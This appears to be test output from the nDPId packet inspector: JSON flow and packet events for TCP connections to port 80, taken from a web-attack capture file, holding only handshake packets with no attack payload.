+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":1499347460254,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347460254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eW9AAD4GTGmsEAABwKgKMuBSAFDnp7Gex+DFL4AQAOWPeAAAAQEICgE6yPMD5Jpo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347461508,"flow_last_seen":1499347461508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347461508,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1499347461508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80JNAAD4G9TysEAABwKgKMuBgAFDZtRq+AAAAAKACchC+dwAAAgQFtAQCCAoBOsotAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":1499347461508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347461508,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4GAaiodM2bUav6AScSB9+QAAAgQFtAQCCAoD5JuiATrKLQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":1499347461509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347461509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00JRAAD4G9UOsEAABwKgKMuBgAFDZtRq\/GoqHTYAQAOUdAQAAAQEICgE6yi0D5Jui"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347462759,"flow_last_seen":1499347462759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347462759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1499347462759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K55AAD4GmjKsEAABwKgKMuBuAFAjB+D7AAAAAKACchCtogAAAgQFtAQCCAoBOstlAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":1499347462759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347462759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4G52KJeXIwfg\/KAScSAAAgAAAgQFtAQCCAoD5JzbATrLZQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":1499347462760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347462760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K59AAD4GmjmsEAABwKgKMuBuAFAjB+D8diiXmIAQAOWfCAAAAQEICgE6y2YD5Jzb"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347465304,"flow_last_seen":1499347465304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465304,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1499347465304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nSBAAD4GKLCsEAABwKgKMuCIAFBo61DCAAAAAKACchD1YAAAAgQFtAQCCAoBOs3iAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":1499347465304,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347465304,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4Ijwu80MaOtQw6AScSCVOwAAAgQFtAQCCAoD5J9XATrN4gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":1499347465305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347465305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nSFAAD4GKLesEAABwKgKMuCIAFBo61DD8LvNDYAQAOU0QwAAAQEICgE6zeID5J9X"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347332137,"flow_last_seen":1499347337710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347333419,"flow_last_seen":1499347338710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347334667,"flow_last_seen":1499347339710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347337226,"flow_last_seen":1499347342710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347338485,"flow_last_seen":1499347343711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347339782,"flow_last_seen":1499347345712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347465739,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347466553,"flow_last_seen":1499347466553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347466553,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1499347466553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KvdAAD4GmtmsEAABwKgKMuCWAFD9ZuXtAAAAAKACchDKcwAAAgQFtAQCCAoBOs8aAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":1499347466553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347466553,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4JYOrdMQ\/Wbl7qAScSBFIQAAAgQFtAQCCAoD5KCPATrPGgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":1499347466554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347466554,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvhAAD4GmuCsEAABwKgKMuCWAFD9ZuXuDq3TEYAQAOXkKAAAAQEICgE6zxoD5KCP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347467793,"flow_last_seen":1499347467793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347467793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1499347467793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82olAAD4G60asEAABwKgKMuCkAFDARwrZAAAAAKACchDhYwAAAgQFtAQCCAoBOtBQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":1499347467794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347467794,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4KSQwyNLwEcK2qAScSCIigAAAgQFtAQCCAoD5KHFATrQUAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":1499347467794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347467794,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02opAAD4G602sEAABwKgKMuCkAFDARwrakMMjTIAQAOUnkgAAAQEICgE60FAD5KHF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347469060,"flow_last_seen":1499347469060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347469060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1499347469060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H0RAAD4GpoysEAABwKgKMuCyAFAQe87JAAAAAKACchDL9AAAAgQFtAQCCAoBOtGNAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":1499347469061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347469061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4LKyNukIEHvOyqAScSCKrQAAAgQFtAQCCAoD5KMCATrRjQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":1499347469061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347469061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H0VAAD4GppOsEAABwKgKMuCyAFAQe87KsjbpCYAQAOUptQAAAQEICgE60Y0D5KMC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347470328,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347470328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvtAAD4GktWsEAABwKgKMuDAAFBLw+AxAAAAAKACchB9+QAAAgQFtAQCCAoBOtLKAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347470328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4MBkpV8JS8PgMqAScSATBgAAAgQFtAQCCAoD5KQ\/ATrSygEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":1499347470328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347470328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvxAAD4GktysEAABwKgKMuDAAFBLw+AyZKVfCoAQAOWyDQAAAQEICgE60soD5KQ\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347471594,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347471594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VndAAD4Gb1msEAABwKgKMuDOAFAlMIJxAAAAAKACchABAwAAAgQFtAQCCAoBOtQGAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":2,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347471594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4M5lR7ajJTCCcqAScSA8lgAAAgQFtAQCCAoD5KV8ATrUBgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":3,"flow_last_seen":1499347471594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347471594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VnhAAD4Gb2CsEAABwKgKMuDOAFAlMIJyZUe2pIAQAOXbnQAAAQEICgE61AYD5KV8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347474100,"flow_last_seen":1499347474100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347474100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1499347474100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IdhAAD4Go\/isEAABwKgKMuDoAFDgcfehAAAAAKACchDOAwAAAgQFtAQCCAoBOtZ5AAAAAAEDAwc="} 